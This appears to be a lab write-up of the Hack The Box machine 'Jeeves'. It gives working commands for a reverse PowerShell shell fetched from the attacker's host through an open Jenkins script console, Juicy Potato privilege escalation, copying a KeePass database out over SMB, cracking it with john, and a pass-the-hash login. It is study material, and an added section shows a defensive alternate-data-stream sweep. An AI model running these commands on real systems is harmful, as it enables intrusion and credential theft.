Windows Boxes

jeeves

  1. nmapAutomator.sh
    1. nmap
      1. nmap vulns
    2. recon
      1. gobuster
      2. nikto
  2. webserver 80
  3. webserver 50000
    1. searchsploit
      1. directory traversal
  4. Initial foothold
    1. /askjeeves
      1. manage jenkins
        1. script console (cmd execution)
        2. Invoke_PowershellTcp
  5. priv esc to root
    1. windows-exploit-suggester
    2. juicy potato
      1. download jp to victim
        1. shell.bat
      2. jp.exe -t * -p shell.bat -l 9001
      3. rev shell
    3. intended way
      1. smbshare
      2. keepass2john
      3. kpcli
        1. entries
      4. pth-winexe/psexec privesc
      5. using powershell commands in limited shell
  6. hm.txt
  7. user/root flags
  8. lessons learned

jeeves

images/1261-1.png
images/1261-2.png

nmapAutomator.sh

Let's run Tib3rius' nmapAutomator scan to start with
nmapAutomator.sh 10.10.10.63 All
• nmap
• recon

nmap

images/1263-1.png

webserver is running on port 80
SMB is running on ports 135 and 445
another webserver seems to be running on port 50000
images/1263-2.png
images/1263-3.png

nmap vulns

images/1265-1.png

images/1265-2.png

recon

gobuster 80,50000
nikto

gobuster

port 80 gobuster

images/1270-1.png

port 50000
images/1270-2.png

nikto

images/1271-1.png

webserver 80

images/1266-1.png

error.html is just a picture and is most likely there to mislead us if we attempt to enumerate it
images/1266-2.png
images/1266-3.png

the page source shows this "error message" is just a picture
images/1266-4.png
images/1266-5.png

webserver 50000

images/1267-1.png


images/1267-2.png
we have a version

searchsploit

Note: DEAD END

jetty was version 9.4, no luck here besides the directory traversal
images/1268-1.png

directory traversal

images/1269-1.png

images/1269-2.png

let's try navigating to
10.10.10.63:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key

images/1269-3.png
no luck, jetty does not seem to have any known exploits

Initial foothold

since we've run into nothing but rabbit holes at this point, let's try a different wordlist for gobuster

gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
images/1275-1.png

we see we have a hit for /askjeeves
images/1275-2.png

/askjeeves

apparently the Jenkins administrative panel is not password protected? Huge security misconfiguration here.
images/1274-1.png

manage jenkins

script console catches the eye
images/1276-1.png
it executes arbitrary scripts for administration/troubleshooting/diagnostics

script console (cmd execution)

images/1277-1.png

we see we have command execution!

Invoke_PowershellTcp

we'll use nishang's Invoke-PowerShellTcp here to call a reverse PowerShell shell back to our attack machine

1. first thing is to copy the nishang script (Invoke-PowerShellTcp.ps1) to our working directory
2. add Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.62 -Port 4444 to the end of the script so it fires when the script is loaded
3. next is to have the victim fetch and run it with an IEX downloadstring command

images/1278-1.png

images/1278-2.png

cmd = "powershell IEX (new-object net.webclient).downloadstring('http://10.10.14.62:5555/revshell.ps1')"

images/1278-3.png

images/1278-4.png

and we see we get our shell called back to us!
images/1278-5.png

priv esc to root

let's enumerate jeeves' security misconfigurations with windows-exploit-suggester first since that's a favorite of mine
windows-exploit-suggester
• juicy potato
• intended way

windows-exploit-suggester

first we grab the systeminfo output of the box and save it to a file

images/1281-1.png
python windows-exploit-suggester.py -d 2020-07-02-mssb.xls -i /root/Documents/htb/boxes/jeeves/system
images/1281-2.png
images/1281-3.png
images/1281-4.png
images/1281-5.png
images/1281-6.png


juicy potato

first thing we need to do is download juicy potato to our machine

images/1283-1.png

I open with archive manager because the save file option gives us an empty file
images/1283-2.png

download jp to victim

first set up the webserver

copy another invoke-powershelltcp.ps1 and have it run a reverse shell back to us on a port of our choosing

images/1286-1.png
Invoke-powershelltcp -reverse -IPAddress 10.10.14.62 -port 6666
images/1286-2.png

images/1286-3.png

download the exploits to our victim with the following powershell commands:
IEX(new-object net.webclient).downloadfile('http://10.10.14.62:5555/jp.exe', 'C:\Users\kohsuke\Desktop\jp.exe')

IEX(new-object net.webclient).downloadfile('http://10.10.14.62:5555/shell.bat', 'C:\Users\kohsuke\Desktop\shell.bat')

images/1286-4.png

shell.bat

simple batch file that downloads and runs our second invoke-powershelltcp.ps1 (served as revshell2.ps1)

@ECHO OFF
PowerShell.exe -Command "IEX(new-object net.webclient).downloadstring('http://10.10.14.62:5555/revshell2.ps1')"
PAUSE

images/1288-1.png

jp.exe -t * -p shell.bat -l 9001

./jp.exe -t * -p shell.bat -l 9001
-t: which CreateProcess call to use; * tries both (CreateProcessWithTokenW and CreateProcessAsUser).
-p: the program to run. we'll need a batch script that sends a reverse shell back to our attack machine.
-l: COM server listen port.

images/1287-1.png
(because it's over 9000)

rev shell

and we're NT AUTHORITY\SYSTEM!
images/1285-1.png

intended way

There is a keepass database file located in Kohsuke's Documents folder that may contain sensitive data we can use to escalate our privileges to root
images/1284-1.png
first we need to exfiltrate this file to our attacking machine; since certutil isn't on this box we'll set up an SMB share and copy it over that way

smbshare

first we'll set up our own SMB share using impacket's built-in smbserver and then copy CEH.kdbx to it

impacket-smbserver temp .
where temp is the share name and . serves the current directory as the share
images/1291-1.png

New-PSDrive -Name temp -PSProvider "FileSystem" -Root "\\10.10.14.62\temp"
images/1291-2.png

navigate to the share
cd temp:
images/1291-3.png

copy CEH.kdbx to the smbshare
images/1291-4.png

and now we have it on our attack machine
images/1291-5.png

keepass2john

because the keepass database is password protected we'll need to brute force it with John

keepass2john CEH.kdbx
images/1292-1.png
save this hash to a txt file for john to crack

we see here that john has the potential to brute force KeePass hashes, exactly what we're looking for
images/1292-2.png

lets run john with the following:
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
images/1292-3.png

our password is cracked
images/1292-4.png

kpcli

Now we have all the information we need to open the KeePass database. To do that from the command line, we'll use the kpcli program.

kpcli --kdb CEH.kdbx
and enter the cracked password, moonshine1, when prompted
images/1293-1.png


entries

to show the details of an entry from our entry list,

show -f <#>
where -f reveals the password field that kpcli masks by default
images/1296-1.png


I'm not going to bother with admin and bob because I know from the net user command that they're not users on the system. The Backup stuff entry however contains what looks like an NTLM hash.
images/1296-2.png
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

pth-winexe/psexec privesc

Let's try a pass the hash attack on the administrator account.
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

be sure to separate the user and the hash with a %!
pth-winexe --user=administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
images/1294-1.png

and we're admin!

we can use our ntlm hash in psexec as well
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63
images/1294-2.png
images/1294-3.png

using powershell commands in limited shell

since our psexec/pth-winexe connections drop us into cmd.exe rather than a PowerShell session, we can run a PowerShell one-liner from cmd with

powershell (Get-Content -path hm.txt -stream root.txt)
images/1298-1.png

hm.txt

we're not done yet after we get root:
images/1289-1.png
images/1289-2.png
"Look deeper" is hinting that hm.txt has more content than it shows: an NTFS alternate data stream. Get-Item's -Stream parameter lets us check for one.

list the file's streams with the command
Get-Item -path hm.txt -stream *
images/1289-3.png

Get-Content -path hm.txt -stream root.txt
images/1289-4.png
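An added example, not from the writeup, that generalizes the hm.txt check above into a sweep of a whole directory tree for alternate data streams, the kind of check a defender runs to find content hidden in streams; the $Root path is an assumption.

```powershell
# Added example, not from the original writeup: sweep a directory tree for NTFS
# alternate data streams (ADS), the mechanism that hid root.txt inside hm.txt.
# $Root is an assumed starting path; point it at the directory under review.
param(
    [string]$Root = "C:\Users\Administrator\Desktop"
)

# Zone.Identifier is the Mark-of-the-Web stream browsers add to downloads and is
# usually benign noise; every other named stream is worth a look.
$benign = @('Zone.Identifier')

# Every file has a default unnamed stream, ':$DATA'; anything else is an ADS.
$findings = Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
    Where-Object { $_.Stream -ne ':$DATA' -and $benign -notcontains $_.Stream } |
    Select-Object FileName, Stream, Length

if (-not $findings) {
    Write-Output "No alternate data streams found under $Root"
    return
}

$findings | Format-Table -AutoSize | Out-Host

# Show the contents of each stream found, the same way the writeup read root.txt
# out of hm.txt with Get-Content -Stream. -Raw returns the stream as one string.
foreach ($f in $findings) {
    Write-Output "==== $($f.FileName):$($f.Stream) ($($f.Length) bytes) ===="
    Get-Content -LiteralPath $f.FileName -Stream $f.Stream -Raw -ErrorAction SilentlyContinue
}
```

Run it from an elevated PowerShell prompt so that files owned by other users are readable; dir /r in cmd.exe shows the same stream names if PowerShell is unavailable.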

user/root flags

images/1279-1.png
e3232272596fb47950d59c4cf1e7066a

images/1279-2.png
afbc5bd4b615a60648cec41c6ac92530

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1295-1.png